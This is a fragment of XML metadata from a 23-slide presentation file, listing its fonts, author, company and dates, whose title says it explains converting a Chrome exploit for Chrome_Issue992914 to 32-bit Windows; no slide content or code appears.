  <Paragraphs>1064</Paragraphs>
  <Slides>23</Slides>
  <Notes>0</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23</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="30" baseType="lpstr">
      <vt:lpstr>Clear Sans Medium</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>D2Coding</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>추억</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AmesianX(amesianx@gmail.com)</Manager>
  <Company>GNUSYSLAB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convert Chrome_Issue992914 exploit to 32-bit on Windows</dc:title>
  <dc:subject>exploit</dc:subject>
  <dc:creator>이스트 오컬트; AmesianX</dc:creator>
  <dc:description>How to convert Chrome_Issue992914 exploit to 32-bit on Windows</dc:description>
  <cp:lastModifiedBy>이스트 오컬트</cp:lastModifiedBy>
  <cp:revision>324</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-23T15:24:58Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-28T14:48:12Z</dcterms:modified>
  <cp:version>1.0</cp:version>
</cp:coreProperties>
</file>